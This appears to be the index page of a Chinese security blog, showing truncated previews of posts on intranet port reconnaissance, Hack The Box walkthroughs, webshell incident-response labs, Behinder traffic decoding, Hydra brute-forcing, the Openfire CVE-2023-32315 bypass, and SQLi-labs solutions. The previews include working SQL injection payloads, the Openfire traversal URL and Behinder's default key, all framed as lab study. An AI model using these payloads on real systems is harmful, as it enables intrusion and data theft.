内网信息收集命令速查
来自于互联网收集,用于备忘速查,可使用CTRL + F速查
重要端口及服务
port
service
description
21
FTP
FTP控制端口,检查匿名登录、弱口令
22
SSH
SSH远程登录协议,检查弱口令
23
Telnet
Telnet终端仿真协议
53
DNS服务
80
Web
检查常见Web漏洞及管理后台
111
NFS
网络文件系统
389
LDAP
轻型目录访问协议,检查是否存在匿名访问
443
OpenSSL
检查心脏滴血及Web漏洞
445
SMB
检查是否存在MS17-010、MS08-067漏洞
512
Rexec
检查远程shell命令及暴力破解
873
Rsync
检查匿名登录、弱口令
1433
SQL Server
数据库服务
1521
Oracle
数据库服务
2049
NFS
NFS未授权访问
2181
Zookeeper
分布式协调系统
2375
Docker Remote
API未授权访问
3306
MySQL
数据库服务
3389
RDP
远程桌面
4 ...
HTB-Freelancer(域渗透)
前言
Hack The Box的一个域渗透靶机,官方难度评级为hard,整体打下来感觉挺符合实际渗透的一些场景,主要涉及到垂直越权、MSSQL命令执行、DMP文件泄露、域控RBCD利用等技术,是台值得一练的靶机。
信息搜集先扫一下端口
开放端口挺多,再扫一下具体信息
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556┌──(kali㉿kali)-[~/box/Freelancer]└─$ cat nmap/ports.nmap| grep open | awk -F'/' '{print $1}' | tr '\n' ',' 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49676,49677,49680,54679,54683, ...
一个webshell引起的Linux应急响应
概述靶机来源:知善攻防实验室
前景需要:看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3
题解登录ssh,查看一下登录日志last -n 10
192.168.235.1是我本机ip,那么192.168.20.1可能是攻击者的
查看一下历史命令history
可以看到攻击者在”/www/wwwroot/127.0.0.1/“文件夹下创建了”.api”隐藏文件夹,将”api/“文件夹复制到创建的隐藏文件夹”.api”,并修改了”mpnotify.php”文件;同时看到攻击者在环境变量里写入的flag3:flag{5 ...
冰蝎流量解析-记一道集团CTF
前言之前不喜欢打CTF,觉得CTF和实际工作中的环境操作差距过大,但本次集团的CTF中有一道流量解析的题目感觉和实际稍微贴近一些,就记录下来
题目概述冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,其最大特点就是对交互流量进行对称加密,且加密秘钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。冰蝎的主要通信过程就是密钥协商和加密传输(一般是aes或xor),可从寻找密钥再破解加密算法入手获取流量中的信息。本题需从流量中找出flag。
本题格式:flag{……}
解题冰蝎每一代都有不同的特征,可以到https://github.com/rebeyond/Behinder/releases查看源码。
冰蝎1使用一次GET请求协商密钥;冰蝎2使用两次get并将第二次GET的响应作为密钥;冰蝎3使用预共享密钥,默认密钥是作者的ID:rebeyond的MD5加密值的前16位“e45e329feb5d925b”,默认链接密码是“rebeyond”;冰蝎4可以完全自定义加密方式。
本题的流量是冰蝎2,主要加密方式是aes和xor,使用第二次get请求得到的响应内容“ ...
Hydra使用之爆破WEB登录密码
WEB登录密码爆破方式有很多,比如Burpsuite等,本次介绍利用Hydra爆破的方式
0x01 Hydra简介Hydra,俗称九头蛇,是由著名的黑客组织THC开发的一款开源暴力破解、验证性质的工具,支持多种服务协议的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装。
0x02 基础参数123456789101112-l: 指定单个用户名, 适合在知道用户名的情况下爆破密码时使用-L: 指定多个用户名, 参数值为存储用户名的文件(字典)的路径(建议为绝对路径)-p: 指定单个密码, 适合在知道密码的情况下爆破用户名时使用-P: 指定多个密码, 参数值为存储密码的文件( 字典) 的路径(建议为绝对路径)-C: 当用户名和密码存储到一个文件时使用此参数。注意: 文件(字典) 存储的格式必须为" 用户名:密码" 的格式-M: 指定多个攻击目标, 此参数为存储攻击目标的文件路径( 建议为绝对路径) 。注意: 列表文件存储格式必须为" 地址:端口"-f: ...
CVE-2023-32315:Openfire身份认证绕过&后台RCE漏洞
0x00 前言最近打HTB靶场过程中,遇到过两次Openfire相关漏洞,本次就单独梳理出来。
0x01 漏洞描述Openfire是一款基于XMPP(前称Jabber,即时通讯协议)的跨平台开源实时协作(RTC)服务器,它是基于java语言开发的,提供了一套完整的实时通信解决方案,能够构建高效率的即时通信服务器,并支持上万并发用户数量。
但Openfire存在认证绕过漏洞,未经身份认证的远程攻击者可以构造恶意请求未授权访问后台页面,最终上传恶意文件实现远程代码执行
0x02 影响版本3.10.0 <= Openfire < 4.6.8
4.7.0 <= Openfire 4.7.x < 4.7.5
0x03 漏洞复现本次以HTB中的Solarlab中的Openfire为例:
访问http://x.x.x.:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp,如果能未授权访问到日志文件,说明存在该漏洞
先获得 JSESSIONID 和 csrftoken
12345678GET /se ...
HTB-SolarLab
Hack The Box的windows靶机,官方评定难度为Medium,涉及445端口利用、WEB密码爆破、CVE-2023-33733、CVE-2023-32315等技术,总的来说是台质量还不错的Windows靶机。废话不多说,直接开干。
信息收集端口扫描
目标开放80,135,139,445,6791端口,并扫描到域名report.solarlab.htb:6791和solarlab.htb,把这些域名全部添加到host文件
445端口利用看到开放了445端口,尝试一下smb匿名登录
发现目标可以利用smb匿名访问,接着查看一下Documents文件夹
利用get命令把里面的文件下载到本地查看,发现details-file.xlsx文件中存在账号密码,先保存下来备用
WEB端口利用看完了445端口,再看一下开放web的80端口和6791端口
打开80端口对应web网页,暂时没发现可利用的点,先放一放
打开6791端口对应web页面,发现一个登录页面
刚刚正好收集到账号密码爆破一下试试
1hydra -L user.txt -P pass ...
SQLi-labs通关攻略(Less11-20)
Less-11/12(POST请求-报错注入)Less-11: 闭合方式为 ‘
Less-12: 闭合方式为 “)
联合注入:
123456uname=a' order by 2 --+&passwd=1&submit=Submituname=a' union select 1, datebase() --+&passwd=1&submit=Submituname=a' union select 1,group_concat(schema_name) from information_schema.schemata --+&passwd=1&submit=Submit 数据库uname=a' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' --+&passwd=1&submit=Submit ...
应急响应靶机-Web2(Windows)
HVV临近,看到几个应急响应靶场还不错,做做练练手
一、靶机简介前景需要:安全设备有告警,请登录服务器系统排查,请你找出以下内容,并作为通关条件:
1.攻击者的IP地址(两个)?
2.攻击者的webshell文件名?
3.攻击者的webshell密码?
4.攻击者的伪QQ号?
5.攻击者的伪服务器IP地址?
6.攻击者的服务器端口?
7.攻击者是如何入侵的(选择题)?
8.攻击者的隐藏用户名?
相关账户密码:
用户:administrator
密码:Zgsf@qq.com
二、解题先启动靶机的相关服务
看到该服务器运行的有Apache,首先找到并分析一下apache的日志文件
分析Apache日志发现有IP为192.168.126.135的攻击者执行目录扫描,但是未找到上传webshell成功日志信息,但是找到了疑似连接webshell的信息
在网站根目录下找到system.php,打开查看,确认为攻击者上传的webshell,文件名为:system.php,连接密 ...
SQLi-labs通关攻略(Less1-10)
Less-1(字符型)12345?id=1 正常?id=1' 报错?id=1' and 1=1--+ 正常?id=1' and 1=2--+ 报错判断是字符型注入,闭合方式是'
123456?id=1'order by 3--+ 判断出回显位置3个?id=-1' union select 1,2,3--+ 判断三个回显位置?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 爆出数据库名?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名?id=-1' union select 1,2,group_concat(column_name) from informat ...